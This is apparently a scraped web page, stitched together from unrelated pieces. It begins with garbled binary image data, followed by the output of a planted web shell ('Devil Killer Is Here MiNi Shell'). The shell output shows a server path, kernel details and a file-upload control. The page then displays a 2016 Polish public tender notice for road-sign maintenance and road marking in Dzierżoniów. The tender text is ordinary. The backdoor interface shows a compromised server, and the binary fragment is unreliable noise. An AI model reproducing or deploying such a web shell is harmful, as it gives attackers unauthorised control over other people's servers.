JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160524/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160524/131692-N-2016.html

<p class="kh_header"><b>Dzierżoniów: Przetarg nieograniczony z możliwością składania ofert częściowych - Część I: Bieżące utrzymanie oznakowania pionowego na terenie Dzierżoniowa w latach 2016-2018,
Część II: Wykonywanie oznakowania poziomego na terenie Dzierżoniowa w latach 2016-2018,
 Część III: Wykonywanie oznakowania tymczasowego na terenie Dzierżoniowa w latach 2017-2018.</b><br>
<b>Numer ogłoszenia: 131692 - 2016; data zamieszczenia: 24.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Dzierżoniów , Rynek 1, 58-200 Dzierżoniów, woj. dolnośląskie, tel. 74 6450800, faks 74 6450801.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um.dzierzoniow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony z możliwością składania ofert częściowych - Część I: Bieżące utrzymanie oznakowania pionowego na terenie Dzierżoniowa w latach 2016-2018,
Część II: Wykonywanie oznakowania poziomego na terenie Dzierżoniowa w latach 2016-2018,
 Część III: Wykonywanie oznakowania tymczasowego na terenie Dzierżoniowa w latach 2017-2018..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Zamawiający dopuszcza składanie ofert częściowych - ilość części 3.
2. Niniejsze zamówienie prowadzone jest w trybie przetargu nieograniczonego z możliwością składania ofert częściowych - 
Część I: Bieżące utrzymanie oznakowania pionowego na terenie Dzierżoniowa w latach                    2016-2018, 
Część II: Wykonywanie oznakowania poziomego na terenie Dzierżoniowa w latach 2016-2018, 
Część III: Wykonywanie oznakowania tymczasowego na terenie Dzierżoniowa w latach                 2017-2018.
3. Opis przedmiotu zamówienia dla części I:
1. Przedmiotem zamówienia jest bieżące utrzymanie oznakowania pionowego w zakresie określonym przez Zamawiającego, jak również wynikającym z aktualnych potrzeb takich, jak np. zdarzenia drogowe, wnioski mieszkańców, dewastacja oznakowania, likwidacja zagrożeń.
2. Zakres robót obejmuje:
1)	dostawę, montaż i demontaż słupków znaków drogowych, tabliczek z nazwami ulic i tablic informacyjnych oraz słupków zabezpieczających, wraz z naprawą nawierzchni chodnika lub pobocza po wykonanych pracach,
2)	malowanie słupków do znaków i tablic informacyjnych farbą ftalową na podkładzie farby miniowej lub słupków przeszkodowych,
3)	dostawę, montaż i demontaż tarczy znaków drogowych, tablic informacyjnych, tabliczek,
4)	poprawianie obróconych, wykrzywionych tarczy znaków i tablic informacyjnych, pionowanie słupków do znaków i tablic informacyjnych,
5)	mycie tarczy znaków drogowych i tablic informacyjnych,
6)	czyszczenie zamalowanych tarczy znaków drogowych i tablic informacyjnych środkami chemicznymi,
7)	dostawę i montaż tabliczek z herbem Dzierżoniowa i nazwami ulic.
3. Orientacyjne ilości usług wraz z ryczałtowymi cenami jednostkowymi zastały określone                                          w kosztorysie ofertowym Wykonawcy, stanowiącym załącznik nr 1 do SIWZ.  W zależności od aktualnego zapotrzebowania Zamawiający zastrzega możliwość zmniejszania lub zwiększania ilości usług określonych w kosztorysie ofertowym, stanowiącym załącznik nr 1 do SIWZ. 
4. Znaki drogowe, materiały i inne urządzenia zastosowane w trakcie realizacji niniejszego zamówienia oraz zasady ich umieszczania powinny być zgodne z przepisami prawa                                     w szczególności z Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz. U. z 2003r. Nr 220, poz. 2181 z późniejszymi zmianami) oraz: Specyfikacją techniczną utrzymania oznakowania pionowego na terenie Dzierżoniowa - stanowiącą załącznik nr 22 do SIWZ.
5. Przy realizacji zamówienia Wykonawca zobowiązany jest do przestrzegania przepisów prawa                  w zakresie bezpieczeństwa ruchu drogowego, bezpieczeństwa i higieny pracy oraz ochrony środowiska.  
6. Ponadto Wykonawca ma obowiązek:
1)	realizacji robót objętych zamówieniem z należytą starannością, terminowo, zgodnie ze swoją najlepszą wiedzą i doświadczeniem zgodnie z obowiązującymi normami technicznymi, przepisami ochrony środowiska oraz zasadami bhp;
2)	zawarcie przed podpisaniem niniejszej umowy, umowy ubezpieczenia odpowiedzialności cywilnej na kwotę nie niższą niż 40.000,00 zł rocznie, przez cały okres obowiązywania umowy;
3)	stosowanie się do wytycznych i wskazówek Zamawiającego, zapewnienie stałego dozoru nad realizacją robót;
4)	wyposażenie pracowników wykonujących roboty fizyczne w odpowiedni czysty strój,               z nazwą firmy wykonującej roboty, posiadający odpowiednie elementy odblaskowe;
5)	odpowiednie oznakowanie pojazdów wykorzystywanych przy wykonywaniu robót                              w celu odróżniania ich od innych pojazdów uczestniczących w ruchu;
6)	dostarczenie Zamawiającemu w ciągu 30 dni od dnia podpisania umowy oświadczenia                    o przeszkoleniu w zakresie BHP oraz ochrony środowiska na stanowisku pracy pracowników zatrudnionych przy wykonywaniu usług związanych z realizacją przedmiotowego zamówienia;
7)	zapewnienie całodobowej łączność telefonicznej, umożliwiającej zgłaszanie nagłych zdarzeń (również przez funkcjonariuszy Policji i Straży Miejskiej);
8)	zabezpieczenie miejsce zdarzenia w ciągu 2 godzin od zgłoszenia telefonicznego oraz przywrócenie oznakowanie do stanu pierwotnego w ciągu 6 godzin, niezależnie od dnia tygodnia i pory wystąpienia zdarzenia, w przypadku nagłych zdarzeń (zniszczenie lub uszkodzenie oznakowania na skutek wypadku drogowego lub dewastacji oznakowania);
9)	posiadanie do stałej dyspozycji (w przypadku nagłych zdarzeń) oznakowania w co najmniej następującej ilości: A-7:4 szt, B-1:3 szt, B-2: 3 szt, B-20:2 szt, D-6: 4 szt;
10)	realizacja każdego typowanego zakresu robót, nawet ograniczonego do wykonania montażu pojedynczego elementu znaku;
11)	zabezpieczenie i oznakowanie miejsca prowadzonych robót;
12)	uporządkowanie terenu po wykonaniu robót;
13)	wykonywanie robót w sposób jak najmniej dezorganizujący ruch drogowy oraz usuwanie na bieżąco zbędnych materiałów i odpadów;
14)	przygotowanie przedmiot umowy do odbioru po uprzednim sprawdzeniu poprawności jego wykonania;
15)	wykonanie, co najmniej raz w tygodniu, przeglądu oznakowania na terenie Dzierżoniowa,                  w którym może uczestniczyć przedstawiciel Zamawiającego lub inspektor nadzoru;                            w przypadku stwierdzenia nieprawidłowości Wykonawca zgłasza je Zamawiającemu, który wyda odpowiednie dyspozycje dotyczące dalszych robót;
16)	 przechowywanie (magazynowanie) materiałów związanych z oznakowaniem dróg,
będącym własnością Zamawiającego. 
7. Wykonawca jest wytwórcą odpadów w rozumieniu ustawy o odpadach, na nim ciążą wszystkie obowiązki określone w w/w ustawie. Wykonawca ponosi wszelkie koszty związane z usunięciem odpadów z miejsca wytworzenia, wykorzystaniem odpadów i ich unieszkodliwieniem.

3. Opis przedmiotu zamówienia dla części II:
1. Przedmiotem zamówienia jest wykonywanie oznakowania poziomego w zakresie określonym przez Zamawiającego, jak również wynikającym z aktualnych potrzeb.
2. Zakres robót obejmuje:
1.	malowanie oznakowania poziomego z zastosowaniem farby rozpuszczalnikowej bez mikrokulek szklanych o grubości warstwy 0,3 - 0,8mm,
2.	malowanie oznakowania poziomego z zastosowaniem farby rozpuszczalnikowej                                z mikrokulkami szklanymi o grubości warstwy 0,3 - 0,8mm,
3.	wykonanie oznakowania grubowarstwowego, odblaskowego, strukturalnego metodą chemoutwardzalną,
4.	usuwanie zbędnego oznakowania poziomego.
3. Orientacyjne ilości usług wraz z ryczałtowymi cenami jednostkowymi zastały określone
w kosztorysie ofertowym Wykonawcy, stanowiącym załącznik nr 8 do SIWZ.  W zależności od aktualnego zapotrzebowania Zamawiający zastrzega możliwość zmniejszania lub zwiększania ilości usług określonych w kosztorysie ofertowym, stanowiącym załącznik nr 8 do SIWZ.
4. Znaki drogowe, materiały i inne urządzenia zastosowane w trakcie realizacji niniejszego zamówienia oraz zasady ich umieszczania powinny być zgodne z przepisami prawa                                  w szczególności z Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz. U. z 2003r. Nr 220, poz. 2181 z późniejszymi zmianami) oraz: Specyfikacją techniczną wykonania oznakowania poziomego na terenie Dzierżoniowa - stanowiącą załącznik nr 23 do SIWZ.
5. Przy realizacji zamówienia Wykonawca zobowiązany jest do przestrzegania przepisów prawa                  w zakresie bezpieczeństwa ruchu drogowego, bezpieczeństwa i higieny pracy oraz ochrony środowiska.
6. Ponadto Wykonawca ma obowiązek:
1)	realizacji robót objętych zamówieniem z należytą starannością, terminowo, zgodnie ze swoją najlepszą wiedzą i doświadczeniem zgodnie z obowiązującymi normami technicznymi, przepisami ochrony środowiska oraz zasadami bhp;
2)	zawarcie przed podpisaniem niniejszej umowy, umowy ubezpieczenia odpowiedzialności cywilnej na kwotę nie niższą niż 40.000,00 zł rocznie, przez cały okres obowiązywania umowy;
3)	zapewnienie stałego dozoru nad realizacją zadania;
4)	wykonanie przedmiotu zamówienia zgodnie z obowiązującymi normami technicznymi, przepisami prawa oraz specyfikacją techniczną, o której mowa w §2 ust. 6 projektu umowy (załącznik nr 9 do SIWZ);
5)	realizowanie robót w kolejności i terminach wyznaczonych przez Zamawiającego                                              w protokołach typowania robót;
6)	realizacja każdego typowanego zakresu robót, nawet ograniczonego do pomalowania powierzchni mniejszej niż 1 m2;
7)	rozpoczęcie robót w ciągu 5 dni roboczych od dnia uzyskania zlecenia;
8)	wykonywanie robót w sposób ciągły, każdego dnia roboczego, do czasu zakończenia zlecenia, chyba, że warunki atmosferyczne nie pozwolą na wykonywanie usług. Tylko                                        w uzasadnionych przypadkach Zamawiający dopuszcza przerwy w wykonywaniu rozpoczętego zlecenia, o czym Wykonawca zobowiązany jest poinformować Zamawiającego;
9)	wykonywanie malowanie oznakowania w czasie zmniejszonego natężenia ruchu,
 tj. w godzinach popołudniowych i wieczornych, w sposób nie powodujący zagrożenia w ruchu drogowym;
10)	we własnym zakresie i na własny koszt zabezpieczyć i oznakować strefy wykonywanych usług;
11)	organizacja, zabezpieczenie i oznakowanie miejsca prowadzonych robót;
12)	wykonywanie robót w sposób jak najmniej dezorganizujący ruch drogowy oraz usuwanie na bieżąco zbędnych materiałów i odpadów, zaleca się malowanie oznakowania w godzinach popołudniowych i mocnych;
13)	pozostawienie, po zakończeniu robót, terenu uporządkowanego, czystego, nadającego się do ponownego użytkowania;
14)	 zgłoszenie Zamawiającemu gotowość odbioru wykonanych robót;
15)	wyposażenie pracowników wykonujących roboty fizyczne w odpowiedni czysty strój,                 z nazwą firmy wykonującej roboty, posiadający odpowiednie elementy odblaskowe;
16)	odpowiednie oznakowanie pojazdów wykorzystywanych przy wykonywaniu robót                   w celu odróżniania ich od innych pojazdów uczestniczących w ruchu;
17)	dostarczenie Zamawiającemu w ciągu 30 dni od dnia podpisania umowy oświadczenia                       o przeszkoleniu w zakresie BHP oraz ochrony środowiska na stanowisku pracy pracowników zatrudnionych przy wykonywaniu usług związanych z realizacją przedmiotowego zamówienia.
7. Wykonawca jest wytwórcą odpadów w rozumieniu ustawy o odpadach, na nim ciążą wszystkie obowiązki określone w w/w ustawie. Wykonawca ponosi wszelkie koszty związane z usunięciem odpadów z miejsca wytworzenia, wykorzystaniem odpadów i ich unieszkodliwieniem.

3. Opis przedmiotu zamówienia dla części III:
1.Przedmiotem zamówienia jest dostawa, montaż, demontaż oznakowania drogowego montowanego na czas lokalnych imprez, świąt i innych okoliczności wskazanych przez Zamawiającego.
2. Zakres usług obejmuje:
1)	dostawę, montaż i demontaż urządzeń będących własnością Wykonawcy:
-	słupki wkopywane,
-	słupki z podstawą gumową,
-	tarcze znaków i tablic informacyjnych,
-	taśma ostrzegawcza U-22, 
-	szpilki stalowe do montowania taśmy ostrzegawczej
2)	 transport, montaż i demontaż urządzeń będących własnością Zamawiającego:
-	słupki wkopywane,
-	słupki z podstawą gumową,
-	tarcze znaków i tablic informacyjnych,
3)	wykonanie lic tablic informacyjnych tymczasowych (tarcze tablic pozostają własnością Wykonawcy).
3. Orientacyjne ilości usług wraz z ryczałtowymi cenami jednostkowymi zastały określone
w kosztorysie ofertowym Wykonawcy, stanowiącym załącznik nr 16 do SIWZ. W zależności od aktualnego zapotrzebowania Zamawiający zastrzega możliwość zmniejszania lub zwiększania ilości usług określonych w kosztorysie ofertowym, stanowiącym załącznik nr 16 do SIWZ. 	
4. Znaki drogowe, materiały i inne urządzenia zastosowane w trakcie realizacji niniejszej umowy oraz zasady ich umieszczania powinny być zgodne z przepisami prawa
w szczególności z Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003r.
w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach
(Dz. U. z 2003r. Nr 220, poz. 2181 z późniejszymi zmianami).
5. Ponadto Wykonawca ma obowiązek:
1)	realizacji robót objętych umową z należytą starannością, terminowo, zgodnie ze swoją najlepszą wiedzą i doświadczeniem zgodnie z obowiązującymi normami technicznymi, przepisami ochrony środowiska oraz zasadami bhp;
2)	stosowanie się do wytycznych i wskazówek Zamawiającego, zapewnienie stałego dozoru nad realizacją robót;
3)	wyposażenie pracowników wykonujących roboty fizyczne w odpowiedni czysty strój,              z nazwą firmy wykonującej roboty, posiadający odpowiednie elementy odblaskowe;
4)	odpowiednie oznakowanie pojazdów wykorzystywanych przy wykonywaniu robót                  w celu odróżniania ich od innych pojazdów uczestniczących w ruchu;
5)	sprawowanie stałego nadzoru nad oznakowaniem od czasu montażu oznakowania do czasu demontażu oznakowania i niezwłocznie usuwanie wszelkie usterki;
6)	pełnienie całodobowego dyżuru telefonicznego. Numer telefonu będzie dostępny dla pracowników urzędu oraz  i funkcjonariuszy Policji i Straży Miejskiej;
7)	w czasie obowiązywania oznakowania tymczasowego, dysponowanie dodatkowym oznakowaniem, w razie konieczności dostarczenie go i zamontuje w ciągu 45 minut od zgłoszenia takiej konieczności;
8)	 wykonanie oznakowania tymczasowego również w godzinach nocnych oraz w dni wolne od pracy;
9)	uporządkowanie terenu po wykonaniu robót.

6. Wykonawca jest wytwórcą odpadów w rozumieniu ustawy o odpadach, na nim ciążą wszystkie obowiązki określone w w/w ustawie. Wykonawca ponosi wszelkie koszty związane z usunięciem odpadów z miejsca wytworzenia, wykorzystaniem odpadów i ich unieszkodliwieniem..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających dla wszystkich części zamówienia. Przedmiot zamówień uzupełniających jest tożsamy z zamówieniem podstawowym. Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających nie więcej niż  30 % wartości zamówień podstawowych.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.92.21.00-7, 45.23.32.90-8, 45.23.32.21-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części I zamówienia:
1)	Dokument: wykazać w załączniku nr 4 do SIWZ roboty budowlane wykonane 
w okresie ostatnich pięciu lat przed upływem terminu składania ofert 
w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania 
oraz 
załączyć dowody dotyczące wykonania:
- minimum 1 roboty o wartości rocznego wynagrodzenia nie mniejszego niż 42.000,00 zł brutto, obejmującej montaż, demontaż, instalowanie znaków drogowych na drogach publicznych (gminnych, powiatowych, wojewódzkich, krajowych);

oraz załączenie dokumentu potwierdzającego, że robota została wykonana w sposób należyty, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona. 

Dla części II zamówienia:
1)	Dokument: wykazać w załączniku nr 11 do SIWZ roboty budowlane wykonane 
w okresie ostatnich pięciu lat przed upływem terminu składania ofert 
w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania 
oraz 
załączyć dowody dotyczące wykonania:
- minimum 1 roboty o wartości rocznego wynagrodzenia nie mniejszego niż 55.000,00 zł brutto, obejmującej wykonanie oznakowania poziomego na drogach publicznych (gminnych, powiatowych, wojewódzkich lub krajowych).

oraz załączenie dokumentu potwierdzającego, że robota została wykonana w sposób należyty, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona

Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	Dokument: wykazać w załączniku nr 12 do SIWZ dysponowanie sprzętem niezbędnym do realizacji robót
oraz 

-złożyć wykaz dotyczący posiadania sprzętu w minimalnej ilości: jedna malowarka ze sterowaniem ręcznym lub elektronicznym, wyposażona w system grawitacyjny lub pneumatyczny do wykonania odblasku, sprzęt do wykonania oznakowania grubowarstwowego (1szt.), jedna szczotka mechaniczna, jedno urządzanie do trwałej likwidacji zbędnego oznakowania wraz z informacją                  o podstawie do dysponowania tymi zasobami.
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dla części I zamówienia:
1. Załącznik nr 1 do SIWZ - wypełniony i podpisany formularz Oferta Wykonawcy,
2. Załącznik nr 6 do SIWZ -informacja dotycząca  podwykonawstwa (jeżeli dotyczy),
3. Załącznik nr 7 do SIWZ - zobowiązanie podmiotu udostępniającego zasoby (jeżeli dotyczy),
4. W przypadku Wykonawców ubiegających się wspólnie o zamówienie                                     i ustanowienia pełnomocnika należy złożyć pełnomocnictwo w oryginale lub kopii potwierdzonej notarialnie za zgodność z oryginałem.
Dla części II zamówienia:
1. Załącznik nr 8 do SIWZ - wypełniony i podpisany formularz Oferta Wykonawcy,
2. Załącznik nr 14 do SIWZ -informacja dotycząca  podwykonawstwa (jeżeli dotyczy),
3. Załącznik nr 15 do SIWZ - zobowiązanie podmiotu udostępniającego zasoby (jeżeli dotyczy),
4. W przypadku Wykonawców ubiegających się wspólnie o zamówienie                                     i ustanowienia pełnomocnika należy złożyć pełnomocnictwo w oryginale lub kopii potwierdzonej notarialnie za zgodność z oryginałem.
Dla części III zamówienia:
1. Załącznik nr 16 do SIWZ - wypełniony i podpisany formularz Oferta Wykonawcy,
2. Załącznik nr 20 do SIWZ -informacja dotycząca  podwykonawstwa (jeżeli dotyczy),
3. Załącznik nr 21 do SIWZ - zobowiązanie podmiotu udostępniającego zasoby (jeżeli dotyczy),
4. W przypadku Wykonawców ubiegających się wspólnie o zamówienie                                     i ustanowienia pełnomocnika należy złożyć pełnomocnictwo w oryginale lub kopii potwierdzonej notarialnie za zgodność z oryginałem.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
